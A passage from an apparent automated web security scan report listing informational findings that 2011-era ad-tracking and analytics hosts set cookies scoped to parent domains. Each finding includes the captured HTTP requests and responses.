Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:45 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:45 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:45 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:45 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:45 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB736F1-3461-003B0596"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www632
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.58. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s7968447030146  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s7968447030146

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s7968447030146?[AQB]&ndh=1&t=26/3/2011%2016%3A15%3A17%202%20300&pageName=support_popup_form_success&ch=contact&events=event2&products=contact_us%3Bsupport_popup_form_success&c1=noncustomer&v1=noncustomer&h1=Home/contact/support_popup_form_success&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&[AQE] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:33 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:33 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:33 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB736E5-65C3-2A5A32CD"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www409
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.59. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79784419631912  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79784419631912

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79784419631912?[AQB]&ndh=1&t=26/3/2011%2016%3A15%3A4%202%20300&pageName=EULA%20-%20Terms%20of%20Use&products=%3B&c1=noncustomer&v1=noncustomer&h1=Home//EULA%20-%20Terms%20of%20Use&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&[AQE] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:30 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:30 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:30 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:30 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:30 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:30 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:30 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB736E2-0C07-4781234A"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www409
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.60. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79902329597084  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79902329597084

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79902329597084?AQB=1&pccr=true&&ndh=1&t=26/3/2011%2016%3A14%3A49%202%20300&pageName=Omniture%20Password%20Recovery%20Page&products=%3B&c1=noncustomer&v1=noncustomer&h1=Home//Omniture%20Password%20Recovery%20Page&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|0-0|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:15 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9B698514A535-4000018C000090B3|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:15 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9B698514A535-4000018C000090B5|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:15 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9B698514A535-4000018C000090B7|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:15 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9B698514A535-4000018C000090B9|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:15 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:15 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:15 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB736D3-4A5E-48AED958"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www496
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.61. http://p.opt.fimserve.com/bht/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /bht/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bht/?px=20&v=1&rnd=1303843577231 HTTP/1.1
Host: p.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; DMEXP=4; UI="2a8dbca1b98673a117|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; LO=00GM67mfm00008f500v7

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: LO=00MD66Bgm1.00CK000J08NhNS1; Domain=.opt.fimserve.com; Expires=Tue, 26-Jul-2011 18:46:21 GMT; Path=/
Content-Type: text/html
Content-Length: 0
Date: Tue, 26 Apr 2011 18:46:20 GMT


13.62. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3306 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303743268_10164:0_10638:0_10640:0_10641:0_1437:0_1660:563596; uid=1_1303743268_1303179323923:6792170478871670; kwd=1_1303743268_11317:0_11717:0_11718:0_11719:0; sit=1_1303743268_719:827:0_2451:51696:46596_3236:209659:209541_782:563945:563596; cre=1_1303743268; bpd=1_1303743268; apd=1_1303743268; scg=1_1303743268; ppd=1_1303743268; afl=1_1303743268

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:00 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303848180_12704:0_10164:104912_10638:104912_10640:104912_10641:104912_1437:104912_1660:668508; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: uid=1_1303848180_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: kwd=1_1303848180_11317:104912_11717:104912_11718:104912_11719:104912; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: sit=1_1303848180_3306:0:0_719:105739:104912_2451:156608:151508_3236:314571:314453_782:668857:668508; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: cre=1_1303848180; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: bpd=1_1303848180; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: apd=1_1303848180; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: scg=1_1303848180; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: ppd=1_1303848180; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Set-Cookie: afl=1_1303848180; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:00 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 26 Apr 2011 20:03:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 290

<!-- campaign #12704 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...

13.63. http://pixel.mathtag.com/event/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/js?mt_id=101241&mt_adid=100255&v1=&v2=&v3=&s1=&s2=&s3= HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=5058492012321.949?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303691668

Response

HTTP/1.1 200 OK
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-x4 pid 0x71ef 29167
Cache-Control: no-cache
Content-Type: text/javascript
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Tue, 26 Apr 2011 18:46:16 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1303843576; domain=.mathtag.com; path=/; expires=Wed, 25-Apr-2012 18:46:16 GMT
Content-Length: 2116

   /*
   http://action.mathtag.com/mm//PHOE//lpg?nm=LandngPg&s0=&s1=&s2=&v0=&v1=&v2=&ri=[RandomNumber]
   http://tags.bluekai.com/site/1654?ret=pp&_bkt=3&_bks=RMDhBtDtjMQ=
   http://www.googleadservices.com/p
...[SNIP]...

13.64. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=803168029;fpan=0;fpa=P0-2123435684-1303854386635;ns=0;url=http%3A%2F%2Fwww.widgetbox.com%2Flist%2Fmost_popular;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303854387569;tzo=300;a=p-3ayZhMX92Pd1o HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=ECMAFu8kjVmtjIMLyxuBAVcBzQaB0QDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=977076&id=755565&id=744649&id=1056982&id=1056950&id=1056980&id=1056949&id=744655&t=2
Set-Cookie: d=EF0AFu8kjVmtjIMLyxuBAXABzQaB0QDe0k_Boc0jjUKjsY5cH0L-EZIMuBfDCDgYgSIMEDDoQPGRggGhjjH_EADokgAQLbZ6Qw; expires=Mon, 25-Jul-2011 21:46:17 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Tue, 26 Apr 2011 21:46:17 GMT
Server: QS


13.65. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=4140 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; csi15=3188371.js^1^1303615864^1303615864; csi2=3153070.js^1^1303613706^1303613706; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:46:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%264140%3D1; expires=Thu, 26-May-2011 18:46:44 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C0%2C1%2C%2C; expires=Thu, 26-May-2011 18:46:44 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.66. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=7zRdy3HvetQzzJrusGV0WgUYWXerDbWSrgMFxw-mCPoYOsR8WF6iMILz5GrRaTzYj9ILcvkNLozW5XfQm-OIAw&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=5058492012321.949?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=RNJ9hNp_Ytke4K3_MLDetaBZCzjPRhryFEOqult4msa76nVUEQrqCfHGx7lLD55exEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7YnPNAqpsobwskjQzsb37_Pf2EzZTks7MGb0-GsBSAyZLfwESJ4HNhmJtjvBex-YKB5MGYB2nENTxzt6uCLwC5ZNpEEy1Y6E_EHxRfmbLZ1cZAp6lfWXEyXpQ0UKYwGF6TGhPyeXqnVY7Z3281c6JDsemNa-3CGw7dg2Xbxl9yyj4GzMLLi_eaSDDqINHp02oDhNKKp2uy6Jf_izbJ4fT1Iu_2URTPQwp7prxJqmG7gw9SyCjmpX6JZPgLa8yTvHuZqGjdQJTtjVZ9bXK_YQ_BTqP4noXltQtlWO_ADLz9yaG1HPNJmxjyYHWoZ-RvqO1R0S-iv_7FnY0Y5Xeddz_jO_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrDwtRWptERdq1_CwAIiDWPEKR1gXBTdH5jry0PtoQ1AeLHTgneiPs4w-PNB0rlR8LbQ13hqHz-NHOrXrabdjXmcRCHTQmWZ5Wp2jjyoTn-TRx9yZxewgOeaPJ0dTEeD2PttBPdeqoht9ByqjYbOh33ulo3YD0zbB9W6Jh-fPou70xdysS9NILgDVV-2RjchUloGmpS1vpTy7CEw_F27aSBKrxrCOwXSkhXOnAokDiKNJ7fwESJ4HNhmJtjvBex-YKAXUSxCCUQ26wFsXGXfUWiK7dQaUAsNKGmGOpY_21OII2rMkfzJCRjod-12LuM3yNFSsZtDmqT68cmfxNCdttVxemNa-3CGw7dg2Xbxl9yyjxUjUlBm2w0A6oYt2TFvb88wfqRHkdzRktg9x4ASm7mYj6Inq-va6FwQyLupvU3--XP7Da31DnYEVo5TPgRz20HK8hNK5y4spsdBx22_Atqh4yf7gWdRyY4nO--zz6sln7A3_z4NlZPxFoPt3Uw_aRVSN0m2klEeTW1KA1di8OAYXXVxlTgh_voK6emDWdftgO-nut4CNoTli9hKdQgGGL_ArFbsMU7SM_RHjy_6zjGAVdA-aRZXmNDP7lSI2wQSG_ZkBdgJgIHJ_0GD9hEAnNu6lhUpb2IzujoXnFpxd00nfu4977TrZ8GHyhed93dEHYQYHOHaF4abG8I094dduCWyYLZMG4wQKFopdYuz1yBkrjocbhf_en5ky2Zgm3rpe_TLLYkm6ow_hSldLzYIRQzPkiGLTlQAB-AyRlZy8hNM5CZdwH63dX586rlVt-rm7T5lk3rNTcwPq3Nv0aBcfX_WCWnBzCQuIbOVa7F8E-DsQQ0XtSgyP9-pRtjKBA9Cw6KpKCQRV_nuo9XTdqfcEuFjw1q3jr96MmE73EdnErm3vwl2KfkvqpOe3sJLkGJnP